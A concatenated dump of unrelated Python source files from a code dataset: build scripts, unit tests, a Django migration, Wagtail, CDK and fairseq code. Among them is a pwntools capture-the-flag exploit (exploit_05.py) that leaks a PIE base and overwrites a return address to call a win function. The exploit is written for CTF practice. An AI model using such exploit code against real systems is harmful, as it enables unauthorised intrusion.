packages_in_cache = [x for x in os.listdir(pacman_cache_dir) if
os.path.isfile(os.path.join(pacman_cache_dir, x))]
packages_in_offical_repositories = pacman.get_available()
if args.pacman_update:
# upgrade installed pacman packages
printInfo("Upgrading installed pacman packages...")
rc, out, err = run_command(['pacman', '-Su', '--noconfirm', '--force',
'--ignore', 'package-query', '--ignore',
'pacman-mirrorlist', '--cachedir',
pacman_cache_dir], print_output=True)
if rc != 0:
raise Exception("Failed to upgrade Pacman packages: " + '\n'.join(err))
pkg_dict = dict()
build_package_names = [x.lower() for x in args.build_package_names]
# look for local package sources
locally_available_package_sources = []
if os.path.exists(local_source_dir) and \
os.path.isdir(local_source_dir):
for d in os.listdir(local_source_dir):
pkgbuild_file_path = os.path.join(d, "PKGBUILD")
if os.path.exists(pkgbuild_file_path) and \
os.path.isfile(pkgbuild_file_path):
locally_available_package_sources.append(os.path.basename(d))
# get packages and their dependencies
for pkg_name in build_package_names:
printInfo("Collecting information about {0}...".format(pkg_name))
get_package_recursive(pkg_name,
True,
pkg_dict,
locally_available_package_sources,
args.remove_dowloaded_source,
False)
# build packages
if pkg_name in pkg_dict:
build_package_recursive(pkg_name,
pkg_dict,
args.rebuild,
args.install_all_dependencies,
args.uid,
args.gid)
# print build statistics
printInfo("\nBuild Statistics:")
for pkg_name in build_package_names:
if pkg_name in pkg_dict:
print_build_log(pkg_name, pkg_dict)
try:
main(sys.argv[1:])
exit(0)
except Exception as e:
printError(str(e))
exit(1)
| 2.53125 | 3 |
test/test_schemagen.py | hd23408/nist-schemagen | 1 | 11022 | <reponame>hd23408/nist-schemagen<filename>test/test_schemagen.py
"""Test methods for testing the schemagen package (specifically,
the SchemaGenerator class).
Typical usage example:
python -m unittest
or, to run a single test:
python -m unittest -k test__build_schema
"""
import unittest
import pathlib
import logging
import copy
import os
import pandas as pd
import numpy as np
import schemagen
import filecmp
import string
# Suppress log messages so they don't confuse readers of the test output
logging.basicConfig(level=os.environ.get("LOGLEVEL", "CRITICAL"))
# Sample files for testing
INVALID_INPUT_DATA_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/invalid_input_data.csv"))
EMPTY_INPUT_DATA_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/empty_input_data.csv"))
VALID_INPUT_DATA_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/valid_input_data.csv"))
VALID_SCHEMA_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/parameters.json"))
TEST_OUTPUT_DIRECTORY = str(pathlib.Path(__file__).parent.
joinpath("test_output_files"))
VALID_OUTPUT_PARAMETERS_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/writing_tests/parameters.json"))
VALID_OUTPUT_DATATYPES_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/writing_tests/column_datatypes.json"))
# Test dataframes to convert to a schema. This should contain
# an assortment of the different types that we expect to parse:
# A - float numeric categorical (with missing values)
# B - int32 numeric range
# C - string categorical
#
VALID_TEST_DATAFRAME = pd.DataFrame.from_dict(
{
"A": [1, 2, 3, 4, 5, None, None, None, None, None] * 5,
"B": list(range(1000000, 1000050, 1)),
"C": ["A", "B", "C", "D", "E"] * 10,
"D": list(string.ascii_letters)[0 : 50]
}
)
# This isn't really a dataframe, it's a dict
INVALID_TEST_DATAFRAME = {
"A": ["a", "b", "c", "d", "e", "f", "g"],
"B": list(range(1, 8, 1))
}
# The appropriate schema and column datatypes to create from the test data above
VALID_TEST_SCHEMA = {
"schema": {
"A": {
"dtype": "float", # This gets turned into a float because of the 'None's
"kind": "categorical",
"values": [ 1.0, 2.0, 3.0, 4.0, 5.0 ],
"codes": [ 1, 2, 3, 4, 5 ]
},
"B": {
"dtype": "uint32",
"kind": "numeric",
"min": 1000000,
"max": 1000049,
"bins": 10
},
"C": {
"dtype": "str",
"kind": "categorical",
"values": ["A", "B", "C", "D", "E"],
"codes": [1, 2, 3, 4, 5]
},
"D": {
"dtype": "str",
"kind": "text"
}
}
}
VALID_TEST_COLUMN_DATATYPES = {
"dtype": {
"A": "float",
"B": "uint32",
"C": "str",
"D": "str"
}
}
class TestSchemaGenerator(unittest.TestCase):
"""Test class for the schemagen.SchemaGenerator class.
"""
def test_ctor(self):
"""
Test that a SchemaGenerator can be appropriately
instantiated, and that it initializes its internal variables
appropriately.
"""
schema_generator = schemagen.SchemaGenerator()
self.assertIs(type(schema_generator), schemagen.SchemaGenerator)
self.assertIs(schema_generator.input_csv_file, None)
self.assertIs(schema_generator.input_data_as_dataframe, None)
self.assertIs(schema_generator.output_schema, None)
def test_read_and_parse_csv(self):
"""
Test the full process of reading in and parsing a CSV file.
Make sure the `SchemaGenerator.read_and_parse_csv` method
returns True or False depending on whether it succeeded.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that attempting to parse an invalid file results in "False"
result = schema_generator.read_and_parse_csv(INVALID_INPUT_DATA_FILE)
self.assertIs(result, False)
# Confirm that a valid CSV loads successfully
result = schema_generator.read_and_parse_csv(VALID_INPUT_DATA_FILE)
self.assertIs(result, True)
def test_output_parameters(self):
"""
Test outputting of the parameters file.
"""
schema_generator = schemagen.SchemaGenerator()
# Make an output directory just for this test
test_output_dir = pathlib.Path(TEST_OUTPUT_DIRECTORY). \
joinpath("test_output_parameters")
test_output_dir.mkdir(parents=True, exist_ok=True)
test_output_dir = str(test_output_dir)
test_output_file = str(pathlib.Path(test_output_dir). \
joinpath("parameters.json"))
# Set the output schema to a known good values;
# here we're JUST testing the writing out of the file
schema_generator.output_schema = copy.deepcopy(VALID_TEST_SCHEMA)
# Test writing out to a non-existent directory
retval = schema_generator.output_parameters_json(output_directory="foo")
self.assertEqual(retval, None)
# Test success path
retval = None
retval = schema_generator.output_parameters_json(output_directory=
test_output_dir)
self.assertEqual(retval, test_output_file)
self.assertTrue(filecmp.cmp(test_output_file, VALID_OUTPUT_PARAMETERS_FILE),
msg = test_output_file + " does not match " +
VALID_OUTPUT_PARAMETERS_FILE)
def test_output_datatypes(self):
"""
Test outputting of the column_datatypes file.
"""
schema_generator = schemagen.SchemaGenerator()
# Make an output directory just for this test
test_output_dir = pathlib.Path(TEST_OUTPUT_DIRECTORY). \
joinpath("test_output_datatypes")
test_output_dir.mkdir(parents=True, exist_ok=True)
test_output_dir = str(test_output_dir)
test_output_file = str(pathlib.Path(test_output_dir). \
joinpath("column_datatypes.json"))
# Set the output datatypes to a known good values;
# here we're JUST testing the writing out of the file
schema_generator.output_datatypes = \
copy.deepcopy(VALID_TEST_COLUMN_DATATYPES)
# Test writing out to a non-existent directory
retval = schema_generator.output_column_datatypes_json(
output_directory="foo")
self.assertEqual(retval, None)
# Test success path
retval = None
retval = schema_generator.output_column_datatypes_json(output_directory=
test_output_dir)
self.assertEqual(retval, test_output_file)
self.assertTrue(filecmp.cmp(test_output_file, VALID_OUTPUT_DATATYPES_FILE),
msg = test_output_file + " does not match " +
VALID_OUTPUT_DATATYPES_FILE)
def test__load_csv_succeeds(self):
"""
Test that the `SchemaGenerator._load_csv` method can be used to read
in an appropriately formatted CSV file.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that a valid CSV loads into a DataFrame without throwing errors
result = schema_generator._load_csv(VALID_INPUT_DATA_FILE) # We want to test private methods... pylint: disable=protected-access
self.assertIsInstance(result, pd.core.frame.DataFrame)
def test__load_csv_fails(self):
"""
Test that the `SchemaGenerator._load_csv` method fails when
it tries to read a badly formatted CSV or is given an empty
filename.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that the FileNotFoundError is raised for a non-existing file
with self.assertRaises(FileNotFoundError):
schema_generator._load_csv("") # We want to test private methods... pylint: disable=protected-access
# Confirm that the ParserError is raised when it can't parse the file
with self.assertRaises(pd.errors.ParserError):
schema_generator._load_csv(INVALID_INPUT_DATA_FILE) # We want to test private methods... pylint: disable=protected-access
# Confirm that the EmptyDataError is raised if called against an empty file
with self.assertRaises(pd.errors.EmptyDataError):
schema_generator._load_csv(EMPTY_INPUT_DATA_FILE) # We want to test private methods... pylint: disable=protected-access
def test__build_schema_succeeds(self):
"""
Test that the `SchemaGenerator._build_schema` method can build
an expected schema from a properly formatted DataFrame.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that when we build schema off of our test dataframe,
# we get a result that looks like our expected schema
(params, columns) = schema_generator._build_schema(VALID_TEST_DATAFRAME,
include_text_columns=True) # We want to test private methods... pylint: disable=protected-access
self.assertEqual(params, VALID_TEST_SCHEMA)
self.assertEqual(columns, VALID_TEST_COLUMN_DATATYPES)
# Confirm that when we build schema off of our test dataframe,
# and include "na", we get a result that looks like we expect
(params, columns) = schema_generator._build_schema(VALID_TEST_DATAFRAME, # We want to test private methods... pylint: disable=protected-access
include_text_columns=True, include_na=True)
valid_schema_with_nan = copy.deepcopy(VALID_TEST_SCHEMA)
valid_schema_with_nan["schema"]["A"]["values"].append(np.NaN)
# Including NaN is going to make everything in the column a float
valid_schema_with_nan["schema"]["A"]["dtype"] = "float"
valid_schema_with_nan["schema"]["A"]["values"] = \
list(map(float, valid_schema_with_nan["schema"]["A"]["values"]))
valid_schema_with_nan["schema"]["A"]["codes"] = \
[1, 2, 3, 4, 5, 6]
valid_dtypes_with_nan = copy.deepcopy(VALID_TEST_COLUMN_DATATYPES)
valid_dtypes_with_nan["dtype"]["A"] = "float"
# Need to use np's assertion in order to make NaN == NaN
np.testing.assert_equal(params, valid_schema_with_nan)
self.assertEqual(columns, valid_dtypes_with_nan)
def test__build_schema_fails(self):
"""
Test that the `SchemaGenerator._build_schema` method fails appropriately
when trying to build a schema from something that is not a DataFrame.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that when we build schema off of our test invalid dataframe,
# we fail in the right way
with self.assertRaises(AttributeError):
schema_generator._build_schema(INVALID_TEST_DATAFRAME, # We want to test private methods... pylint: disable=protected-access
max_values_for_categorical = 4)
def test__getters(self):
"""
Test that the getters for the output schema and the column datatypes
return the correct objects.
"""
schema_generator = schemagen.SchemaGenerator()
schema_generator.output_schema = copy.deepcopy(VALID_TEST_SCHEMA)
self.assertEqual(schema_generator.get_parameters_json(),
VALID_TEST_SCHEMA)
schema_generator.output_datatypes = \
copy.deepcopy(VALID_TEST_COLUMN_DATATYPES)
self.assertEqual(schema_generator.get_column_datatypes_json(),
VALID_TEST_COLUMN_DATATYPES)
def test__get_series_dtype(self):
"""
Test that the method that determines the appropriate datatype, min, and max
values does the right thing.
"""
schema_generator = schemagen.SchemaGenerator()
series = pd.Series(["a", "b", "c", "d"])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("str", None, None))
series = pd.Series([1, 2, 2, 3, 4, 5, 6, 7, 8, 9])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("uint8", 1, 9))
series = pd.Series(list(range(1000000, 1000050, 1)))
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("uint32", 1000000, 1000049))
series = pd.Series([0.1, 0.15, 0.2, 0.214, 0.25])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("float", 0.1, 0.25))
series = pd.Series([-1, 0, 1, -2, 0, -3])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("int8", -3, 1))
# If min is 0, don't "fuzz" it, to avoid going negative
series = pd.Series([0, 1, 2, 3, 4, 5])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("uint8", 0, 5))
series = pd.Series(["2021-02-25", "2021-01-05", "2021-06-22"])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("date", "2021-01-05 00:00:00", "2021-06-22 00:00:00"))
if __name__ == "__main__":
unittest.main()
| 2.59375 | 3 |
core/migrations/0008_auto_20190528_1802.py | peterson-dev/code-snippet-app | 2 | 11023 | <reponame>peterson-dev/code-snippet-app
# Generated by Django 2.2.1 on 2019-05-28 22:02
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0007_auto_20190523_1740'),
]
operations = [
migrations.RenameField(
model_name='snippet',
old_name='post_content',
new_name='content',
),
]
| 1.65625 | 2 |
scripts/Biupdownsample/grad_check.py | dongdong93/a2u_matting | 22 | 11024 | import os.path as osp
import sys
import subprocess
subprocess.call(['pip', 'install', 'cvbase'])
import cvbase as cvb
import torch
from torch.autograd import gradcheck
sys.path.append(osp.abspath(osp.join(__file__, '../../')))
from biupdownsample import biupsample_naive, BiupsampleNaive
from biupdownsample import bidownsample_naive, BidownsampleNaive
feat = torch.randn(2, 64, 2, 2, requires_grad=True, device='cuda:0').double()
mask = torch.randn(
2, 100, 4, 4, requires_grad=True, device='cuda:0').sigmoid().double()
print('Gradcheck for biupsample naive...')
test = gradcheck(BiupsampleNaive(5, 4, 2), (feat, mask), atol=1e-4, eps=1e-4)
print(test)
feat = torch.randn(
2, 1024, 100, 100, requires_grad=True, device='cuda:0').float()
mask = torch.randn(
2, 25, 200, 200, requires_grad=True, device='cuda:0').sigmoid().float()
loop_num = 500
time_naive_forward = 0
time_naive_backward = 0
bar = cvb.ProgressBar(loop_num)
timer = cvb.Timer()
for i in range(loop_num):
x = biupsample_naive(feat.clone(), mask.clone(), 5, 1, 2)
torch.cuda.synchronize()
time_naive_forward += timer.since_last_check()
x.sum().backward(retain_graph=True)
torch.cuda.synchronize()
time_naive_backward += timer.since_last_check()
bar.update()
forward_speed = (time_naive_forward + 1e-3) * 1e3 / loop_num
backward_speed = (time_naive_backward + 1e-3) * 1e3 / loop_num
print('\nBiupsample naive time forward: '
f'{forward_speed} ms/iter | time backward: {backward_speed} ms/iter')
# ---------------------------------------------------------------
feat = torch.randn(2, 64, 4, 4, requires_grad=True, device='cuda:0').double()
mask = torch.randn(
2, 16, 4, 4, requires_grad=True, device='cuda:0').double()
print('Gradcheck for bidownsample naive...')
test = gradcheck(BidownsampleNaive(4, 1, 1), (feat, mask), atol=1e-4, eps=1e-4)
print(test)
feat = torch.randn(
2, 512, 200, 200, requires_grad=True, device='cuda:0').float()
mask = torch.randn(
2, 100, 100, 100, requires_grad=True, device='cuda:0').sigmoid().float()
loop_num = 500
time_naive_forward = 0
time_naive_backward = 0
bar = cvb.ProgressBar(loop_num)
timer = cvb.Timer()
for i in range(loop_num):
x = bidownsample_naive(feat.clone(), mask.clone(), 10, 1, 2)
torch.cuda.synchronize()
time_naive_forward += timer.since_last_check()
x.sum().backward(retain_graph=True)
torch.cuda.synchronize()
time_naive_backward += timer.since_last_check()
bar.update()
forward_speed = (time_naive_forward + 1e-3) * 1e3 / loop_num
backward_speed = (time_naive_backward + 1e-3) * 1e3 / loop_num
print('\nBidownsample naive time forward: '
f'{forward_speed} ms/iter | time backward: {backward_speed} ms/iter')
| 2.046875 | 2 |
sunshinectf2020/speedrun/exploit_05.py | nhtri2003gmail/ctf-write-ups | 101 | 11025 | <reponame>nhtri2003gmail/ctf-write-ups<filename>sunshinectf2020/speedrun/exploit_05.py
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./chall_05')
if not args.REMOTE:
p = process(binary.path)
else:
p = remote('chal.2020.sunshinectf.org', 30005)
p.sendlineafter('Race, life\'s greatest.\n','foobar')
p.recvuntil('Yes I\'m going to win: ')
_ = p.recvline().strip()
main = int(_,16)
binary.address = main - binary.sym.main
log.info('binary.address: ' + hex(binary.address))
payload = b''
payload += 56 * b'A'
payload += p64(binary.sym.win)
p.sendline(payload)
p.interactive()
| 2 | 2 |
coderedcms/wagtail_flexible_forms/edit_handlers.py | mikiec84/coderedcms | 9 | 11026 | from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from wagtail.admin.edit_handlers import EditHandler
class FormSubmissionsPanel(EditHandler):
template = "wagtailforms/edit_handlers/form_responses_panel.html"
def bind_to_model(self, model):
new = super().bind_to_model(model)
if self.heading is None:
new.heading = _('{} submissions').format(model.get_verbose_name())
return new
def render(self):
Submission = self.model.get_submission_class()
submissions = Submission.objects.filter(page=self.instance)
submission_count = submissions.count()
if not submission_count:
return ''
return mark_safe(render_to_string(self.template, {
'self': self,
'submission_count': submission_count,
'last_submit_time': (submissions.order_by('submit_time')
.last().submit_time),
}))
| 1.914063 | 2 |
python/elasticache/cache/helper/vpc.py | chejef/aws-cdk-examples-proserve | 6 | 11027 | <reponame>chejef/aws-cdk-examples-proserve<filename>python/elasticache/cache/helper/vpc.py<gh_stars>1-10
from aws_cdk import (
core as cdk,
aws_elasticache as elasticache,
aws_ec2 as ec2,
)
from aws_cdk.core import Tags
from config import config_util as config
def get_vpc(scope: cdk.Construct) -> ec2.Vpc:
"""
Look up and return the none default vpc.
Args:
scope: the cdk construct.
Returns:
ec2.Vpc: The ec2 VPC object based on the vpc id.
"""
vpc = ec2.Vpc.from_lookup(
scope, "vpc", is_default=False, vpc_id=config.get_vpc_id()
)
return vpc
def get_security_group(scope: cdk.Construct) -> ec2.SecurityGroup:
"""
Create and return the security group for the cluster which allows for any ipv4 and configured port number.
Args:
scope: the cdk construct.
Returns:
ec2.SecurityGroup: The ec2 Security Group object for the cluster.
"""
cluster_name = config.get_cluster_name()
vpc = get_vpc(scope)
security_group = ec2.SecurityGroup(
scope, "ElastiCacheSecurityGroup",
vpc=vpc,
allow_all_outbound=True,
security_group_name=f"elasticache-sg-{cluster_name}",
description=f"Security Group for {cluster_name} ElastiCache Cluster",
)
Tags.of(security_group).add("Name", f"elasticache-sg-{cluster_name}")
for allowed_cidr in config.get_allowed_cidrs():
security_group.add_ingress_rule(
ec2.Peer.ipv4(allowed_cidr),
ec2.Port.tcp(config.get_port_number()),
f"Allows connection to ElastiCache cluster {cluster_name}."
)
return security_group
def get_subnet_group(scope: cdk.Construct) -> elasticache.CfnSubnetGroup:
"""
Create and return the elasticache subnet group.
Args:
scope: the cdk construct.
Returns:
elasticache.CfnSubnetGroup: The subnet group that contains the subnets in vpc.
"""
cluster_name = config.get_cluster_name()
subnet_group = elasticache.CfnSubnetGroup(
scope, "ElastiCacheSubnetGroup",
cache_subnet_group_name=f"{cluster_name}-subnet-group",
description=f"ElastiCache subnet group for {cluster_name}",
subnet_ids=config.get_subnet_ids()
)
return subnet_group
| 2.40625 | 2 |
src/pyscaffold/extensions/namespace.py | jayvdb/pyscaffold | 2 | 11028 | # -*- coding: utf-8 -*-
"""
Extension that adjust project file tree to include a namespace package.
This extension adds a **namespace** option to
:obj:`~pyscaffold.api.create_project` and provides correct values for the
options **root_pkg** and **namespace_pkg** to the following functions in the
action list.
"""
import argparse
import os
from os.path import isdir
from os.path import join as join_path
from .. import templates, utils
from ..api import Extension, helpers
from ..log import logger
class Namespace(Extension):
"""Add a namespace (container package) to the generated package."""
def augment_cli(self, parser):
"""Add an option to parser that enables the namespace extension.
Args:
parser (argparse.ArgumentParser): CLI parser object
"""
parser.add_argument(
self.flag,
dest=self.name,
default=None,
action=create_namespace_parser(self),
metavar="NS1[.NS2]",
help="put your project inside a namespace package")
def activate(self, actions):
"""Register an action responsible for adding namespace to the package.
Args:
actions (list): list of actions to perform
Returns:
list: updated list of actions
"""
actions = helpers.register(actions, enforce_namespace_options,
after='get_default_options')
actions = helpers.register(actions, add_namespace,
before='apply_update_rules')
return helpers.register(actions, move_old_package,
after='create_structure')
def create_namespace_parser(obj_ref):
"""Create a namespace parser.
Args:
obj_ref (Extension): object reference to the actual extension
Returns:
NamespaceParser: parser for namespace cli argument
"""
class NamespaceParser(argparse.Action):
"""Consumes the values provided, but also appends the extension
function to the extensions list.
"""
def __call__(self, parser, namespace, values, option_string=None):
namespace.extensions.append(obj_ref)
# Now the extra parameters can be stored
setattr(namespace, self.dest, values)
# save the namespace cli argument for later
obj_ref.args = values
return NamespaceParser
def enforce_namespace_options(struct, opts):
"""Make sure options reflect the namespace usage."""
opts.setdefault('namespace', None)
if opts['namespace']:
opts['ns_list'] = utils.prepare_namespace(opts['namespace'])
opts['root_pkg'] = opts['ns_list'][0]
opts['qual_pkg'] = ".".join([opts['ns_list'][-1], opts['package']])
return struct, opts
def add_namespace(struct, opts):
"""Prepend the namespace to a given file structure
Args:
struct (dict): directory structure as dictionary of dictionaries
opts (dict): options of the project
Returns:
tuple(dict, dict):
directory structure as dictionary of dictionaries and input options
"""
if not opts['namespace']:
return struct, opts
namespace = opts['ns_list'][-1].split('.')
base_struct = struct
struct = base_struct[opts['project']]['src']
pkg_struct = struct[opts['package']]
del struct[opts['package']]
for sub_package in namespace:
struct[sub_package] = {'__init__.py': templates.namespace(opts)}
struct = struct[sub_package]
struct[opts['package']] = pkg_struct
return base_struct, opts
def move_old_package(struct, opts):
"""Move old package that may be eventually created without namespace
Args:
struct (dict): directory structure as dictionary of dictionaries
opts (dict): options of the project
Returns:
tuple(dict, dict):
directory structure as dictionary of dictionaries and input options
"""
old_path = join_path(opts['project'], 'src', opts['package'])
namespace_path = opts['qual_pkg'].replace('.', os.sep)
target = join_path(opts['project'], 'src', namespace_path)
old_exists = opts['pretend'] or isdir(old_path)
# ^ When pretending, pretend also an old folder exists
# to show a worst case scenario log to the user...
if old_exists and opts['qual_pkg'] != opts['package']:
if not opts['pretend']:
logger.warning(
'\nA folder %r exists in the project directory, and it is '
'likely to have been generated by a PyScaffold extension or '
'manually by one of the current project authors.\n'
'Moving it to %r, since a namespace option was passed.\n'
'Please make sure to edit all the files that depend on this '
'package to ensure the correct location.\n',
opts['package'], namespace_path)
utils.move(old_path, target=target,
log=True, pretend=opts['pretend'])
return struct, opts
| 2.3125 | 2 |
tests/solr_tests/tests/test_templatetags.py | speedplane/django-haystack | 1 | 11029 | # encoding: utf-8
from mock import call, patch
from django.template import Template, Context
from django.test import TestCase
from core.models import MockModel
@patch("haystack.templatetags.more_like_this.SearchQuerySet")
class MoreLikeThisTagTestCase(TestCase):
def render(self, template, context):
# Why on Earth does Django not have a TemplateTestCase yet?
t = Template(template)
c = Context(context)
return t.render(c)
def test_more_like_this_without_limit(self, mock_sqs):
mock_model = MockModel.objects.get(pk=3)
template = """{% load more_like_this %}{% more_like_this entry as related_content %}{% for rc in related_content %}{{ rc.id }}{% endfor %}"""
context = {'entry': mock_model}
mlt = mock_sqs.return_value.more_like_this
mlt.return_value = [{"id": "test_id"}]
self.assertEqual("test_id", self.render(template, context))
mlt.assert_called_once_with(mock_model)
def test_more_like_this_with_limit(self, mock_sqs):
mock_model = MockModel.objects.get(pk=3)
template = """{% load more_like_this %}{% more_like_this entry as related_content limit 5 %}{% for rc in related_content %}{{ rc.id }}{% endfor %}"""
context = {'entry': mock_model}
mlt = mock_sqs.return_value.more_like_this
mlt.return_value.__getitem__.return_value = [{"id": "test_id"}]
self.assertEqual("test_id", self.render(template, context))
mlt.assert_called_once_with(mock_model)
mock_sqs.assert_has_calls([call().more_like_this(mock_model),
call().more_like_this().__getitem__(slice(None, 5))],
any_order=True)
def test_more_like_this_for_model(self, mock_sqs):
mock_model = MockModel.objects.get(pk=3)
template = """{% load more_like_this %}{% more_like_this entry as related_content for "core.mock" limit 5 %}{% for rc in related_content %}{{ rc.id }}{% endfor %}"""
context = {'entry': mock_model}
self.render(template, context)
mock_sqs.assert_has_calls([call().models().more_like_this(mock_model),
call().models().more_like_this().__getitem__(slice(None, 5))],
any_order=True)
| 2.453125 | 2 |
tests_project/homepage/views/__init__.py | wynnw/django-mako-plus | 79 | 11030 | <filename>tests_project/homepage/views/__init__.py<gh_stars>10-100
from django_mako_plus.converter import ParameterConverter
from django_mako_plus import view_function
from django.http import HttpRequest
class RecordingConverter(ParameterConverter):
'''Converter that also records the converted variables for inspecting during testing'''
def convert_parameters(self, *args, **kwargs):
# request is usually args[0], but it can be args[1] when using functools.partial in the decorator
request = args[1] if len(args) >= 2 and isinstance(args[1], HttpRequest) else args[0]
args, kwargs = super().convert_parameters(*args, **kwargs)
request.dmp.converted_params = kwargs
return args, kwargs
| 2.375 | 2 |
jupyterlab_bigquery/jupyterlab_bigquery/__init__.py | shunr/jupyter-extensions | 0 | 11031 | <filename>jupyterlab_bigquery/jupyterlab_bigquery/__init__.py
from notebook.utils import url_path_join
from jupyterlab_bigquery.list_items_handler import handlers
from jupyterlab_bigquery.details_handler import DatasetDetailsHandler, TablePreviewHandler, TableDetailsHandler
from jupyterlab_bigquery.version import VERSION
from jupyterlab_bigquery.pagedAPI_handler import PagedQueryHandler
from jupyterlab_bigquery.query_incell_editor import QueryIncellEditor, _cell_magic
__version__ = VERSION
def _jupyter_server_extension_paths():
return [{'module': 'jupyterlab_bigquery'}]
def load_jupyter_server_extension(nb_server_app):
"""
Called when the extension is loaded.
Args:
nb_server_app (NotebookWebApplication): handle to the Notebook webserver instance.
"""
host_pattern = '.*$'
app = nb_server_app.web_app
gcp_v1_endpoint = url_path_join(app.settings['base_url'], 'bigquery', 'v1')
def make_endpoint(endPoint, handler):
return url_path_join(gcp_v1_endpoint, endPoint) + '(.*)', handler
app.add_handlers(
host_pattern,
[
(url_path_join(gcp_v1_endpoint, k) + "(.*)", v)
for (k, v) in handlers.items()
],
)
app.add_handlers(host_pattern, [
# TODO(cbwilkes): Add auth checking if needed.
# (url_path_join(gcp_v1_endpoint, auth'), AuthHandler)
make_endpoint('list', ListHandler),
make_endpoint('datasetdetails', DatasetDetailsHandler),
make_endpoint('tabledetails', TableDetailsHandler),
make_endpoint('tablepreview', TablePreviewHandler),
make_endpoint('query', PagedQueryHandler)
])
def load_ipython_extension(ipython):
"""Called by IPython when this module is loaded as an IPython extension."""
ipython.register_magic_function(
_cell_magic, magic_kind="line", magic_name="bigquery_editor"
)
ipython.register_magic_function(
_cell_magic, magic_kind="cell", magic_name="bigquery_editor"
)
| 2.1875 | 2 |
ios_notifications/migrations/0004_auto_20141105_1515.py | chillbear/django-ios-notifications | 2 | 11032 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django_fields.fields
class Migration(migrations.Migration):
dependencies = [
('ios_notifications', '0003_notification_loc_payload'),
]
operations = [
migrations.AlterField(
model_name='apnservice',
name='passphrase',
field=django_fields.fields.EncryptedCharField(help_text=b'Passphrase for the private key', max_length=101, null=True, blank=True),
preserve_default=True,
),
]
| 1.609375 | 2 |
fairseq/tasks/audio_pretraining.py | hwp/fairseq | 4 | 11033 | # Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import editdistance
import os
import sys
import torch
from fairseq.data import AddTargetDataset, Dictionary, FileAudioDataset, encoders
from fairseq.data.data_utils import post_process
from . import LegacyFairseqTask, register_task
from .. import utils
from ..logging import metrics
class LabelEncoder(object):
def __init__(self, dictionary):
self.dictionary = dictionary
def __call__(self, label):
return self.dictionary.encode_line(
label, append_eos=False, add_if_not_exist=False
)
@register_task("audio_pretraining")
class AudioPretrainingTask(LegacyFairseqTask):
""""""
@staticmethod
def add_args(parser):
"""Add task-specific arguments to the parser."""
parser.add_argument("data", help="path to data directory")
parser.add_argument(
"--sample-rate",
default=16000,
type=int,
help="target sample rate. audio files will be up/down sampled to this rate",
)
parser.add_argument(
"--normalize",
action="store_true",
help="if set, normalizes input to have 0 mean and unit variance",
)
parser.add_argument(
"--max-sample-size",
default=None,
type=int,
help="max sample size to crop to for batching. default = min sample length",
)
parser.add_argument(
"--min-sample-size",
default=None,
type=int,
help="min sample size to crop to for batching. default = same as --max-sample-size",
)
parser.add_argument(
"--enable-padding",
action="store_true",
help="pad shorter samples instead of cropping",
)
parser.add_argument(
"--labels",
type=str,
default=None,
help="extension of the label file to load, if any",
)
# Options for reporting WER metrics during validation. Only applicable to
# Seq2Seq models during fine-tuning
parser.add_argument(
"--eval-wer",
action="store_true",
help="compute WER for Seq2Seq models",
)
parser.add_argument(
"--eval-wer-remove-bpe",
default="letter",
help="remove BPE tokens before scoring (can be sentencepiece, letter, and more)",
)
def __init__(self, args, source_dictionary=None, target_dictionary=None):
super().__init__(args)
self._target_dictionary = target_dictionary
self._source_dictionary = source_dictionary
self.is_ctc = args.criterion == "ctc"
if getattr(self.args, "eval_wer", False):
assert args.labels is not None, "eval_wer can only be set during fine-tuning"
@classmethod
def setup_task(cls, args, **kwargs):
"""Setup the task (e.g., load dictionaries).
Args:
args (omegaconf.DictConfig): parsed command-line arguments
"""
if args.labels:
dict_path = os.path.join(args.data, f"dict.{args.labels}.txt")
target_dictionary = Dictionary.load(dict_path)
else:
target_dictionary = None
return cls(args, target_dictionary=target_dictionary)
def load_dataset(self, split, **kwargs):
"""Load a given dataset split.
Args:
split (str): name of the split (e.g., train, valid, test)
"""
manifest = os.path.join(self.args.data, "{}.tsv".format(split))
self.datasets[split] = FileAudioDataset(
manifest,
sample_rate=self.args.sample_rate,
max_sample_size=self.args.max_sample_size,
min_sample_size=self.args.max_sample_size,
min_length=self.args.min_sample_size,
pad=self.args.labels is not None or self.args.enable_padding,
normalize=self.args.normalize,
)
if self.args.labels:
label_path = os.path.join(self.args.data, f"{split}.{self.args.labels}")
labels = []
with open(label_path, "r") as f:
for line in f:
labels.append(line)
process_label = LabelEncoder(self.target_dictionary)
self.datasets[split] = AddTargetDataset(
self.datasets[split],
labels,
pad=self.target_dictionary.pad(),
eos=self.target_dictionary.eos(),
batch_targets=True,
process_label=process_label,
add_to_input=not self.is_ctc,
)
@property
def source_dictionary(self):
return self._source_dictionary
@property
def target_dictionary(self):
"""Return the :class:`~fairseq.data.Dictionary` for the language
model."""
return self._target_dictionary
def max_positions(self):
"""Maximum input length supported by the encoder."""
return (sys.maxsize, sys.maxsize)
def filter_indices_by_size(
self,
indices,
dataset,
max_positions=None,
